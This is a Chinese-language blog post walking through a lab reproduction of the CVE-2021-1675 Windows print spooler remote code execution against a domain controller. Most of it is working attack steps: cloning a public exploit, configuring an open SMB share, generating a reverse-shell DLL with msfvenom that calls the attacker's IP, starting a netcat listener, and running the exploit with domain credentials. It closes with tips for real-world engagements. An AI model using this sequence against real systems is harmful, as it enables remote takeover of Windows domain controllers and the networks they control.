1. 程式人生 > 其它 >CVE-2021-1675遠端RCE復現

CVE-2021-1675遠端RCE復現

前言

為了復現前幾天爆出的CVE-2021-1675遠端RCE,我的週末過得很充實,謹以此篇記錄那個永遠都回不來的週末。

測試環境

DC:Windows Server 2019 192.168.110.110

PC:Windows 10 192.168.110.120

Attack:Kali2020.3 192.168.110.132

在域控Windows Server 2019上建立普通域使用者user1,使用user1登入域主機Windows 10確定可用

遠端RCE復現

exp地址:https://github.com/cube0x0/CVE-2021-1675

git clone https://github.com/cube0x0/CVE-2021-1675.git

按照exp專案上smb上傳後執行的方法,配置kali的smb配置檔案/etc/samba/smb.conf:

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody

啟動smb

impacket-smbserver smb /tmp/

kali使用msf生成dll木馬:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.132 LPORT=7777 -f dll -o /tmp/sjbs.dll

並監聽埠:

nc -lvvp 7777

執行exp:

python3 CVE-2021-1675.py hacker.test/win10:ShiJinBuShi@192.168.110.110 '\\192.168.110.132\smb\sjbs.dll'

看到剛生成的dll木馬成功上傳到了域控伺服器:

接收到shell:

踩到的坑

域控伺服器:最開始是使用的Windows Server 2012 R2,可惜不管什麼姿勢都無法成功。後來學長告訴我:

Kali的smb服務:正常起smb服務後執行exp報錯了

本地測試一下:

管理員許可權powershell啟用smb1後就好了:

Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

但是實戰中我們不可能去域控上開啟SMB1,所以只需要Windows開啟smb,將dll檔案放在Windows的共享目錄並在執行exp時使用該地址即可。

本篇參考:

https://github.com/cube0x0/CVE-2021-1675/issues/19